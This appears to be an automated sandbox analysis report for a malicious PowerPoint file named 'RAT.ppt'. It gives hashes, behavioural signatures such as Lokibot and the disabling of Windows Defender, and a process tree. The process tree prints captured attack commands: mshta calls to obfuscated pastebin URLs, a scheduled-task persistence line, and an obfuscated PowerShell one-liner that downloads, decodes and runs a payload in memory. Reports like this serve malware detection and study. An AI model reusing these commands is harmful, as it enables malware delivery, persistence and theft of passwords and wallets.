Analysis

  • max time kernel
    139s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    18-08-2020 09:28

General

  • Target

    RAT.ppt

  • Size

    87KB

  • MD5

    996d8c68ecfe98a2ce25c177927a90e0

  • SHA1

    538d30afcc2d003f95c5f82714134957c8957159

  • SHA256

    20b52843f8e11a925f7008ffe96848e846099130c0c23bd80b3f3c6ee726e234

  • SHA512

    b9f2f992227632b86bcf2aad781738c2be173610bd41359fc581a89c7e4b44cac714385d28f7c967be2a31e8a3c33132aa6d5ced071d41c47aaa1f6c415cff1e

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pastebin.com/raw/aKjCtLDg

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\RAT.ppt"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:108
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://%909123id%909123id%909123id%909123id%[email protected]\kkkasriiiiii2rkoodd
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Modifies Internet Explorer settings
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      PID:268
      • C:\Windows\System32\mshta.exe
        mshta https://%50%50%50%50%50%50%50%[email protected]\raw\1Kps24Kt
        3⤵
        • Blocklisted process makes network request
        • Adds Run key to start application
        • Modifies Internet Explorer settings
        PID:1964
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 70 /tn "xestuohtiwfyl" /F /tr "\"mshta\"https://%20%[email protected]\raw\1Kps24Kt
        3⤵
        • Creates scheduled task(s)
        PID:1184
      • C:\Windows\System32\mshta.exe
        mshta https://%50%50%50%50%50%50%50%[email protected]\raw\CkLFEYsw
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        PID:2032
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell ((gp HKCU:\Software).Fucku)|IEX
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1492
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/aKjCtLDg'));$_Xpin=$_Xpin.replace('.','*!(@*#(!@#*').replace('*!(@*#(!@#*','0');$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1448
    • \??\c:\windows\system32\cmstp.exe
      "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\2emtvo5b.inf
      2⤵
        PID:324

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/108-4-0x0000000004850000-0x0000000004854000-memory.dmp

      Filesize

      16KB

    • memory/108-2-0x0000000000730000-0x0000000000731000-memory.dmp

      Filesize

      4KB

    • memory/108-0-0x0000000005850000-0x0000000005950000-memory.dmp

      Filesize

      1024KB

    • memory/700-5-0x000007FEF2130000-0x000007FEF23AA000-memory.dmp

      Filesize

      2.5MB

    • memory/1448-24-0x000000001AD80000-0x000000001AD81000-memory.dmp

      Filesize

      4KB

    • memory/1448-34-0x0000000002750000-0x0000000002757000-memory.dmp

      Filesize

      28KB

    • memory/1448-17-0x000007FEF52D0000-0x000007FEF5CBC000-memory.dmp

      Filesize

      9.9MB

    • memory/1492-31-0x000000001C4C0000-0x000000001C4C1000-memory.dmp

      Filesize

      4KB

    • memory/1492-41-0x000000001B5A0000-0x000000001B5A1000-memory.dmp

      Filesize

      4KB

    • memory/1492-28-0x0000000001F20000-0x0000000001F21000-memory.dmp

      Filesize

      4KB

    • memory/1492-30-0x000000001C230000-0x000000001C231000-memory.dmp

      Filesize

      4KB

    • memory/1492-22-0x0000000002050000-0x0000000002051000-memory.dmp

      Filesize

      4KB

    • memory/1492-18-0x000007FEF52D0000-0x000007FEF5CBC000-memory.dmp

      Filesize

      9.9MB

    • memory/1492-58-0x000000001C5D0000-0x000000001C5D1000-memory.dmp

      Filesize

      4KB

    • memory/1492-57-0x000000001C5C0000-0x000000001C5C1000-memory.dmp

      Filesize

      4KB

    • memory/1492-45-0x000000001B7D0000-0x000000001B7D1000-memory.dmp

      Filesize

      4KB

    • memory/1492-40-0x000000001C590000-0x000000001C59D000-memory.dmp

      Filesize

      52KB

    • memory/1492-26-0x0000000002710000-0x0000000002711000-memory.dmp

      Filesize

      4KB

    • memory/1492-42-0x000000001B7A0000-0x000000001B7A1000-memory.dmp

      Filesize

      4KB

    • memory/1964-19-0x0000000006920000-0x0000000006943000-memory.dmp

      Filesize

      140KB